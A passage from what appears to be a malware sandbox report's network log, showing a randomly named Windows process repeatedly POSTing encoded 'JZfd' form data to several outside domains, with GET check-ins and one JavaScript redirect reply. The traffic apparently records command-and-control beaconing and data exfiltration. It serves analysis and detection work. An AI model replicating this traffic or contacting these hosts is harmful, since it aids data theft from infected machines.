                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.4 | 52658 | 162.0.231.203 | 80 |  | 
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:54.941356897 CET | 10936 | OUT | POST /rvdc/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.infiniteve.xyz
                                                                        Origin: http://www.infiniteve.xyz
                                                                        Referer: http://www.infiniteve.xyz/rvdc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 31 51 36 59 37 70 69 47 6e 42 6c 69 4e 64 51 66 62 56 30 49 56 47 41 75 62 70 34 61 50 74 50 65 77 79 6d 55 50 72 4d 73 65 35 4b 72 2b 4e 64 37 6d 45 52 6d 30 39 6f 72 6f 47 57 75 61 73 36 48 64 66 77 31 54 4c 33 59 73 33 74 36 47 4c 66 78 5a 6a 62 76 48 6f 30 62 4e 2f 2f 4e 41 4b 57 56 67 70 68 58 48 39 30 45 6c 44 7a 76 2f 2f 7a 41 4c 2b 43 6c 32 4c 6f 57 52 6c 75 74 31 36 62 64 58 30 4b 30 71 78 63 73 51 6e 38 47 6a 6e 7a 53 54 58 56 61 72 68 79 74 67 4c 41 7a 61 67 71 55 71 6b 4d 2f 6f 49 30 5a 2f 37 7a 74 6c 61 79 41 76 51 2b 4b 4d 72 4f 44 52 62 58 6e 56 77 4d 6d 59 4e 51 73 4c 56 54 7a 53 2b 46 39 4e 52 5a 4b 58 37 6b 45 74 32 68 46 56 62 4b 6f 33 6c 5a 62 38 45 59 4c 62 31 67 31 2f 6a 70 55 56 2f 37 4d 45 65 79 78 58 53 39 76 38 4a 56 69 79 74 73 44 68 7a 2f 55 72 66 65 6b 57 4f 34 4e 62 30 4d 6c 34 35 49 4f 4a 74 51 51 43 5a 6c 74 6b 74 55 41 68 68 62 65 59 31 76 6a 63 41 51 33 6c 70 68 32 5a 53 63 61 75 7a 48 62 58 35 55 43 4d 79 62 6d 6b 4d 31 56 76 53 67 49 37 65 31 73 77 [TRUNCATED]
                                                                        Data Ascii: JZfd= [TRUNCATED]
                                                                        Feb 18, 2025 08:15:55.550357103 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:55 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.4 | 52659 | 162.0.231.203 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:15:57.481786966 CET | 569 | OUT | GET /rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.infiniteve.xyz
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:15:58.060925961 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:57 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.4 | 52660 | 13.248.169.48 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:16:03.216617107 CET | 840 | OUT | POST /mvfs/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.weilaishijie.xyz
                                                                        Origin: http://www.weilaishijie.xyz
                                                                        Referer: http://www.weilaishijie.xyz/mvfs/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 44 56 57 33 46 77 31 74 4c 68 71 79 75 54 79 2b 68 58 6b 4a 5a 51 47 5a 79 42 4f 4c 6e 78 4e 66 7a 2b 77 45 30 62 69 44 32 4c 35 69 4a 49 70 77 46 62 77 38 64 67 56 57 61 43 70 74 71 76 76 61 69 41 67 38 64 47 6f 6c 43 62 63 36 36 61 76 43 59 6d 71 44 65 65 70 65 66 75 63 39 59 30 53 63 4b 6c 37 64 33 68 79 57 41 55 33 31 42 66 4d 32 51 4a 49 46 65 2b 39 61 6f 52 6f 38 68 36 32 6d 4d 44 79 30 63 71 61 66 4d 6c 37 6f 35 64 6a 6e 51 51 69 2f 68 6c 4c 49 51 65 74 69 76 41 46 2b 72 43 79 34 4b 31 6f 66 65 65 45 78 42 78 6d 76 79 58 38 42 77 6c 35 66 4d 34 6f 64 76 43 6a 56 64 67 3d 3d
                                                                        Data Ascii: JZfd=DVW3Fw1tLhqyuTy+hXkJZQGZyBOLnxNfz+wE0biD2L5iJIpwFbw8dgVWaCptqvvaiAg8dGolCbc66avCYmqDeepefuc9Y0ScKl7d3hyWAU31BfM2QJIFe+9aoRo8h62mMDy0cqafMl7o5djnQQi/hlLIQetivAF+rCy4K1ofeeExBxmvyX8Bwl5fM4odvCjVdg==
                                                                        Feb 18, 2025 08:16:03.676928043 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.4 | 52661 | 13.248.169.48 | 80 | 2924 | C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:16:05.771408081 CET | 860 | OUT | POST /mvfs/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.weilaishijie.xyz
                                                                        Origin: http://www.weilaishijie.xyz
                                                                        Referer: http://www.weilaishijie.xyz/mvfs/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 44 56 57 33 46 77 31 74 4c 68 71 79 76 77 36 2b 6a 30 4d 4a 65 77 47 61 32 78 4f 4c 74 52 4e 62 7a 2b 38 45 30 66 36 54 32 39 42 69 49 70 5a 77 47 5a 49 38 55 77 56 57 53 69 6f 6c 79 50 76 54 69 41 73 30 64 48 45 6c 43 62 49 36 36 62 66 43 5a 56 79 4d 66 4f 70 59 53 4f 63 2f 47 45 53 63 4b 6c 37 64 33 68 33 4c 41 55 66 31 47 73 55 32 52 6f 49 43 64 2b 39 46 2f 68 6f 38 6c 36 33 74 4d 44 79 43 63 72 47 78 4d 6e 44 6f 35 64 54 6e 52 42 69 77 6f 6c 4c 30 65 2b 73 68 68 67 67 76 75 43 53 35 56 57 59 4b 42 63 31 58 4a 58 72 31 6a 6d 64 57 69 6c 64 73 52 2f 68 70 69 42 65 63 47 6d 61 51 2f 41 69 37 6b 76 50 39 5a 49 4e 76 57 65 71 7a 64 78 4d 3d
                                                                        Data Ascii: JZfd=DVW3Fw1tLhqyvw6+j0MJewGa2xOLtRNbz+8E0f6T29BiIpZwGZI8UwVWSiolyPvTiAs0dHElCbI66bfCZVyMfOpYSOc/GEScKl7d3h3LAUf1GsU2RoICd+9F/ho8l63tMDyCcrGxMnDo5dTnRBiwolL0e+shhggvuCS5VWYKBc1XJXr1jmdWildsR/hpiBecGmaQ/Ai7kvP9ZINvWeqzdxM=
                                                                        Feb 18, 2025 08:16:06.212783098 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 52662 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 2924 | Process: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:16:08.324414968 CET | 10942 | OUT | POST /mvfs/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.weilaishijie.xyz
                                                                        Origin: http://www.weilaishijie.xyz
                                                                        Referer: http://www.weilaishijie.xyz/mvfs/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 44 56 57 33 46 77 31 74 4c 68 71 79 76 77 36 2b 6a 30 4d 4a 65 77 47 61 32 78 4f 4c 74 52 4e 62 7a 2b 38 45 30 66 36 54 32 39 4a 69 4a 62 42 77 46 2b 6b 38 4f 77 56 57 52 69 6f 6b 79 50 75 52 69 41 30 4b 64 48 5a 53 43 65 4d 36 37 39 72 43 65 67 47 4d 56 4f 70 59 4f 2b 63 79 59 30 54 45 4b 6c 72 5a 33 68 48 4c 41 55 66 31 47 72 73 32 57 35 49 43 62 2b 39 61 6f 52 6f 4b 68 36 33 46 4d 48 57 53 63 72 43 50 4e 55 4c 6f 34 35 33 6e 53 7a 4b 77 6e 6c 4c 32 64 2b 73 44 68 67 64 33 75 42 33 41 56 57 63 67 42 66 70 58 4d 79 47 4f 2f 45 4e 43 39 56 55 2b 43 49 5a 6f 6e 54 2b 5a 49 48 6e 76 37 54 6d 36 32 64 66 64 62 59 30 42 50 4d 4c 77 63 31 4d 43 33 6e 30 47 42 45 2b 46 59 7a 66 38 34 5a 56 2b 76 55 50 76 32 45 59 55 44 2f 4b 68 4e 77 6d 43 42 73 65 6c 53 31 45 7a 32 64 41 42 70 69 45 67 37 34 75 68 72 32 78 63 54 78 55 7a 32 48 6c 42 45 2b 79 43 32 36 53 34 54 4a 6c 2f 36 74 4f 4f 6b 51 70 59 6a 37 4d 4b 72 58 54 46 67 36 6b 33 44 66 4c 72 56 4d 6b 58 53 66 68 61 31 59 34 6e 79 65 64 64 76 [TRUNCATED]
                                                                        Data Ascii: JZfd=DVW3Fw1tLhqyvw6+j0MJewGa2xOLtRNbz+8E0f6T29JiJbBwF+k8OwVWRiokyPuRiA0KdHZSCeM679rCegGMVOpYO+cyY0TEKlrZ3hHLAUf1Grs2W5ICb+9aoRoKh63FMHWScrCPNULo453nSzKwnlL2d+sDhgd3uB3AVWcgBfpXMyGO/ENC9VU+CIZonT+ZIHnv7Tm62dfdbY0BPMLwc1MC3n0GBE+FYzf84ZV+vUPv2EYUD/KhNwmCBselS1Ez2dABpiEg74uhr2xcTxUz2HlBE+yC26S4TJl/6tOOkQpYj7MKrXTFg6k3DfLrVMkXSfha1Y4nyeddvt0j1FHvExiN0GdNFPzEFxatJaXw1AO7akWpTiCPgJROALZvtsWNMofh235arjIJVW0Q83ZcJth9xpe1s5bJ7FkXarXUKA6foxFrfcJVotC4See4HevjdDHuA0vWU+rUWoOypMg3upTXvik4GDF6tXvtirJh7G/Of6uc3MR92e7FeZDxdTvLP1pkmCnldW8eG1nWWbvFwAaG+rhQwgrznmttlt8uuk9mh6SffeIBhIC9SImMyGgKgZqOPRjEgMnMlQbLhRTiW8h50d0YYBI45ddFJvQAIpF0+/me/adQMiNLIC7KyKOhm3ucBpEDWR+/NneTThKHbUvMB2MUiNEJy92eL+6Hd/5fHVK8uURRukWJUCyBZYMNjlLCmUQdr/lVSMsDOpl6fR4vkQ954qBQ5gqRmxZ0ZQMErjA4Qe1he2nkOQOGLKapvlVXjuAUy1H6/NA1Cm49FtNxFJyRiSYK55WJ3lHjLwGl+AZQL4E6ytRijL1brkPzN6jKvIiMT3mf/7K2Rat+aJrv2xhehBakRdc6xcWjzCfVl7X6ehzven6Z+SmbLpiiy/1e3erApEsbpH6CJLDmzNv/Ta53Rt20VXAz+UiEH1aKzvK748CTkbIawXR5pAs5+T+i87oyA0PYkk/4fsyfroB6CyXPKpUndS1ZrPnTK2ozMsR [TRUNCATED]
                                                                        Feb 18, 2025 08:16:08.769023895 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 52663 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 2924 | Process: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:16:10.872796059 CET | 571 | OUT | GET /mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.weilaishijie.xyz
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:16:14.361450911 CET | 377 | IN | HTTP/1.1 200 OK
                                                                        content-type: text/html
                                                                        date: Tue, 18 Feb 2025 07:16:14 GMT
                                                                        content-length: 256
                                                                        connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 38 74 3d 5f 44 6c 48 39 46 4e 70 4a 62 75 26 4a 5a 66 64 3d 4f 58 2b 58 47 47 31 76 4d 6a 6e 42 70 69 72 36 72 58 30 2f 47 33 6d 6d 36 42 4b 44 6e 58 35 73 39 76 30 43 37 73 43 33 38 4b 56 77 41 35 78 75 53 6f 51 78 51 41 56 74 47 43 30 35 76 66 43 5a 6c 67 41 52 58 77 67 79 43 4a 4d 2f 6d 4b 62 55 51 56 79 4e 65 4f 31 32 64 63 6f 41 54 46 2b 77 44 77 61 76 79 69 43 46 44 47 62 39 54 4e 45 5a 53 34 59 43 4c 50 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo="}</script></head></html>


                                                                        Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 52664 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 2924 | Process: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:16:19.431338072 CET | 825 | OUT | POST /xqy6/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.dqvcbn.info
                                                                        Origin: http://www.dqvcbn.info
                                                                        Referer: http://www.dqvcbn.info/xqy6/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 36 43 31 75 65 4b 39 78 4f 36 34 31 64 61 73 57 4d 45 36 70 6d 4a 45 31 38 50 6d 65 68 32 6a 75 57 57 4b 33 63 6c 4c 62 38 38 38 54 6d 51 30 37 42 43 79 4a 63 6e 43 73 61 38 4a 4a 68 31 74 6a 58 4c 32 62 50 33 39 72 6d 74 78 56 7a 6d 57 6b 4d 67 58 2f 54 6b 67 78 58 38 49 4c 41 6f 43 2b 44 36 34 51 65 2f 79 33 77 33 4a 6c 61 31 4c 70 31 6e 44 65 49 4a 33 4d 6b 78 2b 51 39 4d 73 4c 69 78 53 61 68 76 55 44 65 78 46 56 62 49 34 42 52 67 4f 32 33 6f 63 45 44 48 32 37 6b 4e 6a 54 7a 68 59 36 47 67 6a 56 33 61 47 4e 51 36 71 61 59 4e 63 50 65 30 33 38 6f 38 5a 42 48 4c 6a 43 77 67 3d 3d
                                                                        Data Ascii: JZfd=6C1ueK9xO641dasWME6pmJE18Pmeh2juWWK3clLb888TmQ07BCyJcnCsa8JJh1tjXL2bP39rmtxVzmWkMgX/TkgxX8ILAoC+D64Qe/y3w3Jla1Lp1nDeIJ3Mkx+Q9MsLixSahvUDexFVbI4BRgO23ocEDH27kNjTzhY6GgjV3aGNQ6qaYNcPe038o8ZBHLjCwg==


                                                                        Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 52665 | Destination IP: 47.83.1.90 | Destination Port: 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:16:22.552894115 CET | 845 | OUT | POST /xqy6/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.dqvcbn.info
                                                                        Origin: http://www.dqvcbn.info
                                                                        Referer: http://www.dqvcbn.info/xqy6/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 36 43 31 75 65 4b 39 78 4f 36 34 31 53 62 38 57 50 6b 47 70 6e 70 45 79 35 50 6d 65 72 57 6a 69 57 57 47 33 63 67 76 31 39 4b 45 54 6c 30 77 37 41 44 79 4a 50 58 43 73 52 63 49 4e 6c 31 74 30 58 4c 71 70 50 32 52 72 6d 74 31 56 7a 6c 43 6b 4d 52 58 38 42 45 67 7a 61 63 49 4a 64 59 43 2b 44 36 34 51 65 2b 58 59 77 33 52 6c 61 6b 37 70 31 47 44 42 55 5a 33 50 79 68 2b 51 35 4d 73 50 69 78 54 35 68 74 68 59 65 79 39 56 62 4b 67 42 55 68 4f 31 73 59 63 43 48 48 32 77 74 74 44 58 78 30 68 6d 4f 53 75 77 33 4a 2b 71 59 63 6e 41 4a 38 39 59 4d 30 54 50 31 37 51 31 4b 49 65 4c 72 67 34 54 4d 56 47 67 70 55 79 71 56 47 55 71 50 41 42 63 55 34 51 3d
                                                                        Data Ascii: JZfd=6C1ueK9xO641Sb8WPkGpnpEy5PmerWjiWWG3cgv19KETl0w7ADyJPXCsRcINl1t0XLqpP2Rrmt1VzlCkMRX8BEgzacIJdYC+D64Qe+XYw3Rlak7p1GDBUZ3Pyh+Q5MsPixT5hthYey9VbKgBUhO1sYcCHH2wttDXx0hmOSuw3J+qYcnAJ89YM0TP17Q1KIeLrg4TMVGgpUyqVGUqPABcU4Q=


                                                                        Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 52666 | Destination IP: 47.83.1.90 | Destination Port: 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Feb 18, 2025 08:16:25.102543116 CET | 10927 | OUT | POST /xqy6/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.dqvcbn.info
                                                                        Origin: http://www.dqvcbn.info
                                                                        Referer: http://www.dqvcbn.info/xqy6/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
